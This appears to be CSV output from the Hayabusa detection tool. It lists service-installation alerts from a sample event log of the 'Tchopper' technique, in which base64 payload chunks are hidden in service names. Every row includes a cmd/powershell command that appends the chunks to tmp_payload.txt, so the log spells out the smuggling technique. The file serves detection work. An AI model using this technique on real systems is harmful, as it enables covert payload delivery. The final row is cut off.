08:18:17.117 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:19.634 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:19.634 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:19.634 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:21.088 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:21.088 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:21.088 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:22.542 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:22.542 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:22.542 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:23.979 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:23.979 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:23.979 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:25.446 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:25.446 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:25.446 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:26.912 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:26.912 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:26.912 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:28.373 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:28.373 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:28.373 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:29.844 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:29.844 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:29.844 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:31.297 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:31.297 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:31.297 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:32.740 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:32.740 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:32.740 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:34.190 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:34.190 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:34.190 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:35.638 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:35.638 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:35.638 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:37.081 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 